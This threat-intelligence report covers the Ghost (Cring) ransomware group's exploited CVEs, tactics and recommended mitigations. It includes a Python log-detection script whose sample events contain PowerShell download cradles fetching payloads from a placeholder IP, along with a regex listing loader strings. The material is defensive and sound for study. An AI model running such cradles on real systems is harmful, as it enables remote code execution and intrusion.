Full Report
The Ghost ransomware group, also referred to as Cring, has been actively exploiting vulnerabilities in software and firmware as recently as January 2025, according to an alert issued Wednesday by the Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA). Operating from China, Ghost has been targeting internet-facing services with unpatched security flaws, some of which could have been mitigated years ago. Cybersecurity researchers first detected the group's activities in 2021, and its recent attacks continue to compromise organizations across more than 70 countries, including within China itself.

Scope of the Threat

The alert, released in collaboration with the Multi-State Information Sharing and Analysis Center (MS-ISAC), highlights Ghost's focus on vulnerabilities in:

* Unpatched Fortinet security appliances
* Adobe ColdFusion web application servers
* Microsoft Exchange servers exposed to the ProxyShell attack chain vulnerabilities

These vulnerabilities enable Ghost to breach systems, deploy ransomware, and demand payment from victims. The FBI, CISA, and MS-ISAC emphasized that the group's targets include critical infrastructure, healthcare facilities, educational institutions, government networks, religious organizations, technology firms, manufacturing companies, and small- to medium-sized businesses.

Ghost Ransomware: Tactics, Techniques, and Procedures (TTPs)

Ghost actors have developed various strategies to evade detection and complicate attribution. They frequently rotate their ransomware executable payloads, modify ransom note text, switch the file extensions used for encrypted files, and use multiple ransom email addresses. As a result, cybersecurity experts have associated different names with the group over time, including Ghost, Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.
Exploitation and Attack Methods

Ghost ransomware actors rely on publicly available exploit code for well-known Common Vulnerabilities and Exposures (CVEs), typically in systems where patches have not been applied. Vulnerabilities they have actively exploited include:

* Fortinet FortiOS (CVE-2018-13379)
* Adobe ColdFusion (CVE-2010-2861, CVE-2009-3960)
* Microsoft SharePoint (CVE-2019-0604)
* Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207), the ProxyShell attack chain

Upon gaining access, Ghost actors deploy tools such as Cobalt Strike Beacon to establish a foothold in victim networks. They often upload web shells to compromised servers and use the Windows Command Prompt and PowerShell to carry out further actions.

Persistence and Privilege Escalation

Ghost actors typically spend only a few days in a victim's network before deploying ransomware, but in that time they have been observed creating new local and domain accounts, changing the passwords of existing accounts, and deploying additional web shells. To escalate privileges, they exploit weaknesses in system configurations and use publicly available tools such as SharpZeroLogon, SharpGPPPass, BadPotato, and GodPotato. By impersonating the SYSTEM user, they can run their malicious software with elevated privileges and cause maximum disruption.

Impact and Financial Motivation

Ghost's primary goal is financial gain. Ransom demands have varied widely, sometimes reaching hundreds of thousands of dollars. However, Ghost actors tend to abandon an intrusion when they encounter hardened environments that restrict lateral movement across the network. The impact of Ghost ransomware attacks differs case by case: some organizations experience data encryption and operational disruption, while others with robust backup and recovery solutions have restored operations without paying a ransom.
Recommended Mitigations

The FBI, CISA, and MS-ISAC strongly urge organizations to take the following steps to mitigate the risk of Ghost ransomware attacks:

1. Implement Regular System Backups
Maintain known-good backups that are stored offline or segmented from source systems. Ensure that backups cannot be altered or encrypted from potentially compromised network devices.

2. Patch Known Vulnerabilities
Apply timely security updates to operating systems, software, and firmware. Prioritize patching the vulnerabilities actively exploited by Ghost:
* CVE-2018-13379 (Fortinet FortiOS)
* CVE-2010-2861, CVE-2009-3960 (Adobe ColdFusion)
* CVE-2019-0604 (Microsoft SharePoint, listed among the exploited CVEs above)
* CVE-2021-34473, CVE-2021-34523, CVE-2021-31207 (Microsoft Exchange, ProxyShell)

3. Segment Networks to Restrict Lateral Movement
Separate critical assets from less sensitive parts of the network. Limit access to essential services through securely configured VPNs or firewalls.

4. Enforce Multi-Factor Authentication (MFA)
Require phishing-resistant MFA for privileged accounts and email services. Monitor for unauthorized changes to authentication mechanisms.

5. Enhance Email Security
Deploy advanced email filtering to block phishing attempts. Implement DMARC, DKIM, and SPF to prevent email spoofing.

6. Monitor for Unauthorized PowerShell Use
Ghost actors rely heavily on PowerShell. Restrict PowerShell access to the users who need it, and implement allowlisting for scripts and network traffic.

7. Identify and Investigate Abnormal Network Activity
Watch for unusual commands, scripts, and network traffic patterns. Regularly audit accounts to detect unauthorized creation or modification.

8. Disable Unused Services and Ports
Close unnecessary ports such as RDP (3389), FTP (21), and SMB (445). Restrict the exposure of internal services to external networks.
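The post-exploitation behaviour described above (web shells driving cmd.exe and PowerShell, new accounts and password changes, encoded PowerShell loaders) and mitigations 6 and 7 reduce to the same detection question: which hosts show that chain of events in a short window. The following is an added example, not code from the advisory or this article: a small Python rule set run over constructed Windows event records exported as JSON lines. Event IDs 4688, 4720, 4724 and 4104 are real Windows events, but the export format, field names, hostnames, user names and the 203.0.113.7 URL are assumptions made for the example.

```python
"""Detection rules for the Ghost/Cring post-exploitation TTPs: web server
workers spawning shells, PowerShell loaders (including -EncodedCommand),
new accounts and password resets. Added example; the JSON-lines export
format, the sample events and every host/user name are constructed."""
import base64
import json
import re
from collections import defaultdict

# Windows event IDs used by the rules (Security log unless noted).
EVENT_ACCOUNT_CREATED = 4720   # A user account was created
EVENT_PASSWORD_RESET = 4724    # An attempt was made to reset an account's password
EVENT_PROCESS_CREATED = 4688   # A new process has been created (needs command-line auditing)
EVENT_PS_SCRIPT_BLOCK = 4104   # Microsoft-Windows-PowerShell/Operational script block logging

# Assumed parent/child sets: web server workers that should never spawn a shell.
WEB_SERVER_PARENTS = {"w3wp.exe", "coldfusion.exe", "httpd.exe", "tomcat.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Strings common in PowerShell download cradles and loaders; tune to your environment.
PS_SUSPICIOUS = re.compile(
    r"(?:\bIEX\b|Invoke-Expression|DownloadString|DownloadFile|Net\.WebClient|"
    r"FromBase64String|-nop\b|-w(?:indowstyle)?\s+hidden|-ExecutionPolicy\s+Bypass)",
    re.IGNORECASE,
)


def encode_ps(script):
    """Build the payload PowerShell accepts after -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries -e/-enc/-EncodedCommand <base64>, else None."""
    m = re.search(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", cmdline, re.IGNORECASE)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
        return None


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def analyze(events):
    """Run the rules over event dicts; return (rule, computer, detail) tuples in event order."""
    findings = []
    for ev in events:
        eid, host = ev.get("EventID"), ev.get("Computer", "?")
        if eid == EVENT_ACCOUNT_CREATED:
            findings.append(("new_account", host,
                             f"{ev.get('SubjectUserName')} created {ev.get('TargetUserName')}"))
        elif eid == EVENT_PASSWORD_RESET:
            findings.append(("password_reset", host,
                             f"{ev.get('SubjectUserName')} reset password of {ev.get('TargetUserName')}"))
        elif eid == EVENT_PROCESS_CREATED:
            parent = _basename(ev.get("ParentProcessName", ""))
            child = _basename(ev.get("NewProcessName", ""))
            cmd = ev.get("CommandLine", "")
            if parent in WEB_SERVER_PARENTS and child in SHELL_CHILDREN:
                findings.append(("webshell_spawn", host, f"{parent} -> {child}: {cmd}"))
            decoded = decode_encoded_command(cmd)   # inspect the real script, not just the wrapper
            if child in SHELL_CHILDREN and PS_SUSPICIOUS.search(cmd + " " + (decoded or "")):
                findings.append(("suspicious_powershell", host, decoded or cmd))
        elif eid == EVENT_PS_SCRIPT_BLOCK:
            text = ev.get("ScriptBlockText", "")
            if PS_SUSPICIOUS.search(text):
                findings.append(("suspicious_scriptblock", host, text))
    return findings


def hosts_with_multiple_ttps(findings):
    """Correlate per host: two or more distinct rules in the same log window.
    Ghost's dwell time is days, so one short window covers the whole chain."""
    by_host = defaultdict(set)
    for rule, host, _ in findings:
        by_host[host].add(rule)
    return {h: r for h, r in by_host.items() if len(r) >= 2}


def parse_jsonl(text):
    return [json.loads(line) for line in text.splitlines() if line.strip()]


# Constructed sample log (one JSON event per line). Hostnames, users and the
# 203.0.113.7 address are placeholders, not indicators from the advisory.
SAMPLE_EVENTS = [
    {"EventID": 4688, "Computer": "EXCH01",
     "ParentProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 4688, "Computer": "EXCH01",
     "ParentProcessName": r"C:\Windows\System32\cmd.exe",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/b.ps1')")},
    {"EventID": 4720, "Computer": "DC01", "SubjectUserName": "svc_backup", "TargetUserName": "sqladmin2"},
    {"EventID": 4724, "Computer": "DC01", "SubjectUserName": "svc_backup", "TargetUserName": "Administrator"},
    {"EventID": 4688, "Computer": "WS042", "ParentProcessName": r"C:\Windows\explorer.exe",
     "NewProcessName": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe notes.txt"},
    {"EventID": 4104, "Computer": "WS042", "ScriptBlockText": "Get-Process | Where-Object {$_.CPU -gt 100}"},
    {"EventID": 4104, "Computer": "DC01",
     "ScriptBlockText": "$c = New-Object Net.WebClient; $c.DownloadFile('http://203.0.113.7/x.exe', 'C:\\Users\\Public\\x.exe')"},
]
SAMPLE_LOG = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    hits = analyze(parse_jsonl(SAMPLE_LOG))
    for rule, host, detail in hits:
        print(f"[{rule}] {host}: {detail}")
    print("hosts with multiple TTPs:", hosts_with_multiple_ttps(hits))
```

Two prerequisites matter in a real deployment: 4688 only carries a command line when "Include command line in process creation events" is enabled, and 4104 only exists when PowerShell script block logging is turned on. The per-host correlation is what makes the output actionable: the Exchange server that shows a web server worker spawning cmd.exe and then an encoded download cradle, or the domain controller that shows a new account plus a password reset plus a file download, is worth an immediate look, whereas any one of those rules alone will fire on routine administration.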
Conclusion Ghost ransomware remains a persistent threat to organizations worldwide, with attacks escalating as vulnerabilities in outdated software remain unpatched. By implementing the recommended security measures, organizations can significantly reduce the likelihood of falling victim to this financially motivated cybercriminal group. The FBI, CISA, and MS-ISAC continue to monitor Ghost’s activities and urge organizations to stay vigilant, apply patches promptly, and bolster cybersecurity defenses against evolving ransomware threats.
Analysis Summary
# Threat Actor: Ghost Ransomware Group
## Attribution & Identity
* **Alias/Name:** Ghost Ransomware Group; also tracked as Cring, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture.
* **Association:** Financially motivated cybercriminal group operating from China, active since at least 2021. The FBI, CISA, and MS-ISAC are monitoring its activities.
## Activity Summary
* Active as recently as January 2025, exploiting unpatched internet-facing software and firmware as the primary initial access vector.
* Victims span more than 70 countries, including China.
* Dwell time is short: typically only a few days between initial access and ransomware deployment.
## Tactics, Techniques & Procedures
* **Initial Access:** Exploitation of public-facing applications using publicly available exploit code for known CVEs: Fortinet FortiOS (CVE-2018-13379), Adobe ColdFusion (CVE-2010-2861, CVE-2009-3960), Microsoft SharePoint (CVE-2019-0604), and Microsoft Exchange ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
* **Execution:** Web shells uploaded to compromised servers; Windows Command Prompt and PowerShell.
* **Persistence:** Creation of new local and domain accounts, password changes on existing accounts, additional web shells.
* **Privilege Escalation:** SharpZeroLogon, SharpGPPPass, BadPotato, GodPotato; impersonation of the SYSTEM user.
* **Defense Evasion:** Rotation of ransomware executables, ransom note text, encrypted-file extensions, and ransom email addresses, which has produced multiple aliases.
* **Command and Control:** Cobalt Strike Beacon.
* **Lateral Movement:** Moves within victim networks; tends to abandon intrusions where segmentation restricts lateral movement.
* **Impact:** Data encryption for ransom; demands sometimes reach hundreds of thousands of dollars.
## Targeting
* **Sectors:** Critical infrastructure, healthcare, education, government, religious organizations, technology, manufacturing, and small- to medium-sized businesses.
* **Geography:** More than 70 countries, including China; the operators themselves are located in China.
* **Victims:** No individual victims are named in the report.
## Tools & Infrastructure
* **Malware and Tools Used:** Ghost ransomware (with rotating executables), Cobalt Strike Beacon, web shells, SharpZeroLogon, SharpGPPPass, BadPotato, GodPotato, PowerShell, and cmd.exe.
* **Infrastructure:** Multiple ransom email addresses; not otherwise detailed in the report.
## Implications
Ghost Ransomware is identified as a persistent and ongoing threat. Its reliance on known, unpatched vulnerabilities, some with fixes available for years, means a significant portion of successful intrusions could be prevented through standard vulnerability and patch management. The activity is significant enough to warrant a joint public alert from the FBI, CISA, and MS-ISAC.
## Mitigations
Recommendations focus heavily on hardening network defenses against known attack patterns:
* Maintain known-good backups stored offline or segmented from source systems.
* Prioritize patching, especially the listed CVEs on internet-facing applications.
* Segment networks to restrict lateral movement; limit access to essential services through securely configured VPNs or firewalls.
* Enforce phishing-resistant Multi-Factor Authentication (MFA) for privileged accounts and email services.
* Enhance email security (DMARC, DKIM, SPF) to block phishing and spoofing.
* **Restrict PowerShell Access:** Limit PowerShell to users who need it; implement allowlisting for scripts and network traffic.
* Monitor for unusual scripts, commands, and network traffic; audit for unauthorized account creation or modification.
* Disable unnecessary services and close unused ports (RDP 3389, FTP 21, SMB 445).